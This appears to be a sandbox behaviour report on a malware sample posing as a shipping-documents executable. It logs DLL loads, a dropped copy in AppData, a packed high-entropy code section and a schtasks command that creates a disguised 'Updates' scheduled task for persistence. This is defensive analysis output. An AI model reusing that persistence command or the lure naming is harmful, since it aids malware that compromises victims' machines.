Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: iconcodecservice.dll	Jump to behavior

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_044DEE6C push esp; ret	0_2_044DEE6D
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04B1AD20 pushfd ; retn 0004h	0_2_04B1AD22
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_04B1AD71 pushfd ; retn 0004h	0_2_04B1AD72
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_06A9BF1D push es; iretd	0_2_06A9BF88
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_06A9BF1D push es; iretd	0_2_06A9C018
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_073D3AC0 push ebx; retf	0_2_073D3ADA
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A15AC43 push E807B45Eh; retf	0_2_0A15AC61
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A15AC62 push E806BD5Eh; ret	0_2_0A15AC69
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Code function: 0_2_0A153DB0 pushfd ; retf	0_2_0A153DB1
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_078C3ABA push ebx; retf	8_2_078C3ADA
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Code function: 8_2_07A57AAD push FFFFFF8Bh; iretd	8_2_07A57AAF

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Static PE information: section name: .text entropy: 7.928729441238618
Source: SNgtfGzYQ.exe.0.dr	Static PE information: section name: .text entropy: 7.928729441238618

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	File created: \copy shipping docs po ev1786 ly eco pak ev1.exe
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	File created: \copy shipping docs po ev1786 ly eco pak ev1.exe
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	File created: \copy shipping docs po ev1786 ly eco pak ev1.exe	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	File created: \copy shipping docs po ev1786 ly eco pak ev1.exe	Jump to behavior

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

File created: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SNgtfGzYQ" /XML "C:\Users\user\AppData\Local\Temp\tmpE1BD.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
